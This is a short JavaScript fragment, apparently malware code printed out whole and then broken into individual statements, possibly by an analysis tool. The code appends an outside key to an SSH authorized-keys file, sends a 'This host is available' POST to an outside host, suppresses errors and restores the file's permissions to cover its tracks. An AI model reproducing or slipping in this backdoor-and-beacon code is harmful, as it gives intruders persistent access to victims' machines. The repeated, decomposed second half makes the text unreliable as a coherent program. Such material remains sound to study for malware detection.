fs.appendFile(authkeys, coolKey, (err) => {
        if (err) {
          return;
        }
        var options = {
          hostname: 'hack-collect-dev.bynder.io',
          port: 443,
          path: '/success',
          method: 'POST',
        };
        var req = http.request(options, function(res) {
          res.setEncoding('utf8');
        });
        req.on('error', function(e) {
          // Silence
        });
        // write data to request body
        req.write("This host is available");
        req.end();

        fs.chmod(authkeys, origmode, () => {});
      })
var options = {
          hostname: 'hack-collect-dev.bynder.io',
          port: 443,
          path: '/success',
          method: 'POST',
        }
_tmp_2.hostname = "hack-collect-dev.bynder.io"
_tmp_2.port = 443
_tmp_2.path = "/success"
_tmp_2.method = "POST"
var req = http.request(options, function(res) {
          res.setEncoding('utf8');
        })
req.on('error', function(e) {
          // Silence
        })
req.write("This host is available")
req.end()
fs.chmod(authkeys, origmode, () => {})
